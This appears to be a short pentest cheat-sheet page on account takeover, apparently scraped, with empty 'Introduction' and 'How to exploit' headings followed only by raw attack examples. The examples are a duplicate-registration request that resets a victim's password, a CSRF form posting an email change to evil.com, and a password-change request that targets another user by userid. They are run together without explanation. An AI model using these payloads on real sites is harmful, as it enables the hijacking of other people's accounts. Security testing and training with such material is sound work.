Account Takeover
Introduction
How to exploit
POST /newaccount HTTP/1.1 ... email=victim@mail.com&password=1234POST /newaccount HTTP/1.1 ... email=victim@mail.com&password=hacked<html> <body> <form action="https://evil.com/user/change-email" method="POST"> <input type="hidden" value="victim@gmail.com"/> <input type="submit" value="Submit Request"> </form> </body> </html>POST /changepassword.php HTTP/1.1 Host: site.com ... userid=500&password=heked123
Last updated